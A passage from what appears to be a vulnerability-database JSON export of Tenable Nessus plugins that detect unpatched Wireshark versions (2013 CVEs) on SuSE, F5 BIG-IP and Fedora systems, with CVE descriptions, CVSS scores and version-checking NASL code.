script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"wireshark-1.8.8-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"wireshark-1.8.8-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"wireshark-1.8.8-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"wireshark-1.8.8-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"wireshark-1.8.8-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"wireshark-1.8.8-0.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T01:58:03", "description": "CVE-2013-4074 The dissect_capwap_data function in\nepan/dissectors/packet-capwap.c in the CAPWAP dissector in Wireshark\n1.6.x before 1.6.16 and 1.8.x before 1.8.8 incorrectly uses a -1 data\nvalue to represent an error condition, which allows remote attackers\nto cause a denial of service (application crash) via a crafted packet.\n\nCVE-2013-4075 epan/dissectors/packet-gmr1_bcch.c in the GMR-1 BCCH\ndissector in Wireshark 1.8.x before 1.8.8 does not properly initialize\nmemory, which allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4076 Buffer overflow in the dissect_iphc_crtp_fh function in\nepan/dissectors/packet-ppp.c in the PPP dissector in Wireshark 1.8.x\nbefore 1.8.8 allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4077 Array index error in the NBAP dissector in Wireshark\n1.8.x before 1.8.8 allows remote attackers to cause a denial of\nservice (application crash) via a crafted packet, related to nbap.cnf\nand packet-nbap.c.\n\nCVE-2013-4078 epan/dissectors/packet-rdp.c in the RDP dissector in\nWireshark 1.8.x before 1.8.8 does not validate return values during\nchecks for data availability, which allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet.\n\nCVE-2013-4079 The dissect_schedule_message function in\nepan/dissectors/packet-gsm_cbch.c in the GSM CBCH dissector in\nWireshark 1.8.x before 1.8.8 allows remote attackers to cause a denial\nof service (infinite loop and application hang) via a crafted packet.\n\nCVE-2013-4080 The dissect_r3_upstreamcommand_queryconfig function in\nepan/dissectors/packet-assa_r3.c in the Assa Abloy R3 dissector in\nWireshark 1.8.x before 1.8.8 does not properly handle a zero-length\nitem, which allows remote attackers to cause a denial of service\n(infinite loop, and CPU and memory consumption) via a crafted packet.\n\nCVE-2013-4081 The http_payload_subdissector function in\nepan/dissectors/packet-http.c in the HTTP dissector in Wireshark 1.6.x\nbefore 1.6.16 and 1.8.x before 1.8.8 does not properly determine when\nto use a recursive approach, which allows remote attackers to cause a\ndenial of service (stack consumption) via a crafted packet.\n\nCVE-2013-4082 The vwr_read function in wiretap/vwr.c in the Ixia\nIxVeriWave file parser in Wireshark 1.8.x before 1.8.8 does not\nvalidate the relationship between a record length and a trailer\nlength, which allows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) via a crafted\npacket.\n\nCVE-2013-4083 The dissect_pft function in\nepan/dissectors/packet-dcp-etsi.c in the DCP ETSI dissector in\nWireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8, and 1.10.0 does not\nvalidate a certain fragment length value, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4920 The P1 dissector in Wireshark 1.10.x before 1.10.1 does\nnot properly initialize a global variable, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4921 Off-by-one error in the dissect_radiotap function in\nepan/dissectors/packet-ieee80211-radiotap.c in the Radiotap dissector\nin Wireshark 1.10.x before 1.10.1 allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet.\n\nCVE-2013-4922 Double free vulnerability in the\ndissect_dcom_ActivationProperties function in\nepan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator\ndissector in Wireshark 1.10.x before 1.10.1 allows remote attackers to\ncause a denial of service (application crash) via a crafted packet.\n\nCVE-2013-4923 Memory leak in the dissect_dcom_ActivationProperties\nfunction in epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted packets.\n\nCVE-2013-4924 epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 does not\nproperly validate certain index values, which allows remote attackers\nto cause a denial of service (assertion failure and application exit)\nvia a crafted packet.\n\nCVE-2013-4925 Integer signedness error in\nepan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator\ndissector in Wireshark 1.10.x before 1.10.1 allows remote attackers to\ncause a denial of service (assertion failure and daemon exit) via a\ncrafted packet.\n\nCVE-2013-4926 epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 does not\nproperly determine whether there is remaining packet data to process,\nwhich allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4927 Integer signedness error in the get_type_length function\nin epan/dissectors/packet-btsdp.c in the Bluetooth SDP dissector in\nWireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 allows remote\nattackers to cause a denial of service (loop and CPU consumption) via\na crafted packet.\n\nCVE-2013-4928 Integer signedness error in the dissect_headers function\nin epan/dissectors/packet-btobex.c in the Bluetooth OBEX dissector in\nWireshark 1.10.x before 1.10.1 allows remote attackers to cause a\ndenial of service (infinite loop) via a crafted packet.\n\nCVE-2013-4929 The parseFields function in\nepan/dissectors/packet-dis-pdus.c in the DIS dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not terminate\npacket-data processing after finding zero remaining bytes, which\nallows remote attackers to cause a denial of service (loop) via a\ncrafted packet.\n\nCVE-2013-4930 The dissect_dvbci_tpdu_hdr function in\nepan/dissectors/packet-dvbci.c in the DVB-CI dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not validate a\ncertain length value before decrementing it, which allows remote\nattackers to cause a denial of service (assertion failure and\napplication exit) via a crafted packet.\n\nCVE-2013-4931 epan/proto.c in Wireshark 1.8.x before 1.8.9 and 1.10.x\nbefore 1.10.1 allows remote attackers to cause a denial of service\n(loop) via a crafted packet that is not properly handled by the GSM RR\ndissector.\n\nCVE-2013-4932 Multiple array index errors in\nepan/dissectors/packet-gsm_a_common.c in the GSM A Common dissector in\nWireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 allow remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4933 The netmon_open function in wiretap/netmon.c in the\nNetmon file parser in Wireshark 1.8.x before 1.8.9 and 1.10.x before\n1.10.1 does not properly allocate memory, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet-trace file.\n\nCVE-2013-4934 The netmon_open function in wiretap/netmon.c in the\nNetmon file parser in Wireshark 1.8.x before 1.8.9 and 1.10.x before\n1.10.1 does not initialize certain structure members, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet-trace file.\n\nCVE-2013-4935 The dissect_per_length_determinant function in\nepan/dissectors/packet-per.c in the ASN.1 PER dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not initialize a\nlength field in certain abnormal situations, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4936 The IsDFP_Frame function in\nplugins/profinet/packet-pn-rt.c in the PROFINET Real-Time dissector in\nWireshark 1.10.x before 1.10.1 does not validate MAC addresses, which\nallows remote attackers to cause a denial of service (NULL pointer\ndereference and application crash) via a crafted packet.", "edition": 29, "published": "2014-11-28T00:00:00", "title": "F5 Networks BIG-IP : Multiple Wireshark vulnerabilities (K15868)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-4932", "CVE-2013-4075", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4936", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15868.NASL", "href": "https://www.tenable.com/plugins/nessus/79601", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15868.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79601);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\", \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\", \"CVE-2013-4928\", \"CVE-2013-4929\", \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\", \"CVE-2013-4934\", \"CVE-2013-4935\", \"CVE-2013-4936\");\n script_bugtraq_id(60448, 60495, 60498, 60499, 60500, 60501, 60502, 60503, 60504, 60505, 60506, 61471, 62868);\n\n script_name(english:\"F5 Networks BIG-IP : Multiple Wireshark vulnerabilities (K15868)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2013-4074 The dissect_capwap_data function in\nepan/dissectors/packet-capwap.c in the CAPWAP dissector in Wireshark\n1.6.x before 1.6.16 and 1.8.x before 1.8.8 incorrectly uses a -1 data\nvalue to represent an error condition, which allows remote attackers\nto cause a denial of service (application crash) via a crafted packet.\n\nCVE-2013-4075 epan/dissectors/packet-gmr1_bcch.c in the GMR-1 BCCH\ndissector in Wireshark 1.8.x before 1.8.8 does not properly initialize\nmemory, which allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4076 Buffer overflow in the dissect_iphc_crtp_fh function in\nepan/dissectors/packet-ppp.c in the PPP dissector in Wireshark 1.8.x\nbefore 1.8.8 allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4077 Array index error in the NBAP dissector in Wireshark\n1.8.x before 1.8.8 allows remote attackers to cause a denial of\nservice (application crash) via a crafted packet, related to nbap.cnf\nand packet-nbap.c.\n\nCVE-2013-4078 epan/dissectors/packet-rdp.c in the RDP dissector in\nWireshark 1.8.x before 1.8.8 does not validate return values during\nchecks for data availability, which allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet.\n\nCVE-2013-4079 The dissect_schedule_message function in\nepan/dissectors/packet-gsm_cbch.c in the GSM CBCH dissector in\nWireshark 1.8.x before 1.8.8 allows remote attackers to cause a denial\nof service (infinite loop and application hang) via a crafted packet.\n\nCVE-2013-4080 The dissect_r3_upstreamcommand_queryconfig function in\nepan/dissectors/packet-assa_r3.c in the Assa Abloy R3 dissector in\nWireshark 1.8.x before 1.8.8 does not properly handle a zero-length\nitem, which allows remote attackers to cause a denial of service\n(infinite loop, and CPU and memory consumption) via a crafted packet.\n\nCVE-2013-4081 The http_payload_subdissector function in\nepan/dissectors/packet-http.c in the HTTP dissector in Wireshark 1.6.x\nbefore 1.6.16 and 1.8.x before 1.8.8 does not properly determine when\nto use a recursive approach, which allows remote attackers to cause a\ndenial of service (stack consumption) via a crafted packet.\n\nCVE-2013-4082 The vwr_read function in wiretap/vwr.c in the Ixia\nIxVeriWave file parser in Wireshark 1.8.x before 1.8.8 does not\nvalidate the relationship between a record length and a trailer\nlength, which allows remote attackers to cause a denial of service\n(heap-based buffer overflow and application crash) via a crafted\npacket.\n\nCVE-2013-4083 The dissect_pft function in\nepan/dissectors/packet-dcp-etsi.c in the DCP ETSI dissector in\nWireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8, and 1.10.0 does not\nvalidate a certain fragment length value, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4920 The P1 dissector in Wireshark 1.10.x before 1.10.1 does\nnot properly initialize a global variable, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4921 Off-by-one error in the dissect_radiotap function in\nepan/dissectors/packet-ieee80211-radiotap.c in the Radiotap dissector\nin Wireshark 1.10.x before 1.10.1 allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet.\n\nCVE-2013-4922 Double free vulnerability in the\ndissect_dcom_ActivationProperties function in\nepan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator\ndissector in Wireshark 1.10.x before 1.10.1 allows remote attackers to\ncause a denial of service (application crash) via a crafted packet.\n\nCVE-2013-4923 Memory leak in the dissect_dcom_ActivationProperties\nfunction in epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted packets.\n\nCVE-2013-4924 epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 does not\nproperly validate certain index values, which allows remote attackers\nto cause a denial of service (assertion failure and application exit)\nvia a crafted packet.\n\nCVE-2013-4925 Integer signedness error in\nepan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator\ndissector in Wireshark 1.10.x before 1.10.1 allows remote attackers to\ncause a denial of service (assertion failure and daemon exit) via a\ncrafted packet.\n\nCVE-2013-4926 epan/dissectors/packet-dcom-sysact.c in the DCOM\nISystemActivator dissector in Wireshark 1.10.x before 1.10.1 does not\nproperly determine whether there is remaining packet data to process,\nwhich allows remote attackers to cause a denial of service\n(application crash) via a crafted packet.\n\nCVE-2013-4927 Integer signedness error in the get_type_length function\nin epan/dissectors/packet-btsdp.c in the Bluetooth SDP dissector in\nWireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 allows remote\nattackers to cause a denial of service (loop and CPU consumption) via\na crafted packet.\n\nCVE-2013-4928 Integer signedness error in the dissect_headers function\nin epan/dissectors/packet-btobex.c in the Bluetooth OBEX dissector in\nWireshark 1.10.x before 1.10.1 allows remote attackers to cause a\ndenial of service (infinite loop) via a crafted packet.\n\nCVE-2013-4929 The parseFields function in\nepan/dissectors/packet-dis-pdus.c in the DIS dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not terminate\npacket-data processing after finding zero remaining bytes, which\nallows remote attackers to cause a denial of service (loop) via a\ncrafted packet.\n\nCVE-2013-4930 The dissect_dvbci_tpdu_hdr function in\nepan/dissectors/packet-dvbci.c in the DVB-CI dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not validate a\ncertain length value before decrementing it, which allows remote\nattackers to cause a denial of service (assertion failure and\napplication exit) via a crafted packet.\n\nCVE-2013-4931 epan/proto.c in Wireshark 1.8.x before 1.8.9 and 1.10.x\nbefore 1.10.1 allows remote attackers to cause a denial of service\n(loop) via a crafted packet that is not properly handled by the GSM RR\ndissector.\n\nCVE-2013-4932 Multiple array index errors in\nepan/dissectors/packet-gsm_a_common.c in the GSM A Common dissector in\nWireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 allow remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4933 The netmon_open function in wiretap/netmon.c in the\nNetmon file parser in Wireshark 1.8.x before 1.8.9 and 1.10.x before\n1.10.1 does not properly allocate memory, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet-trace file.\n\nCVE-2013-4934 The netmon_open function in wiretap/netmon.c in the\nNetmon file parser in Wireshark 1.8.x before 1.8.9 and 1.10.x before\n1.10.1 does not initialize certain structure members, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet-trace file.\n\nCVE-2013-4935 The dissect_per_length_determinant function in\nepan/dissectors/packet-per.c in the ASN.1 PER dissector in Wireshark\n1.8.x before 1.8.9 and 1.10.x before 1.10.1 does not initialize a\nlength field in certain abnormal situations, which allows remote\nattackers to cause a denial of service (application crash) via a\ncrafted packet.\n\nCVE-2013-4936 The IsDFP_Frame function in\nplugins/profinet/packet-pn-rt.c in the PROFINET Real-Time dissector in\nWireshark 1.10.x before 1.10.1 does not validate MAC addresses, which\nallows remote attackers to cause a denial of service (NULL pointer\ndereference and application crash) via a crafted packet.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15868\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15868.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15868\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.5.2\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"11.6.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.5.2\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"11.6.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.3.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0-11.2.1\",\"10.0.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:11:11", "description": "dumpcap now stores temporary capture files in /var/tmp\n\n - Convert automake/pkgconfig files into patches (better\n upstream integration)\n\n - Restored category in the *.desktop file\n\n - Install another one necessary header file -\n frame_data_sequence.h\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Various security fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-12-20T00:00:00", "title": "Fedora 18 : wireshark-1.10.2-4.fc18 (2013-17635)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2013-12-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-17635.NASL", "href": "https://www.tenable.com/plugins/nessus/71543", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-17635.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71543);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-3555\", \"CVE-2013-3557\", \"CVE-2013-3558\", \"CVE-2013-3559\", \"CVE-2013-3560\", \"CVE-2013-3562\", \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\", \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\", \"CVE-2013-4928\", \"CVE-2013-4929\", \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", 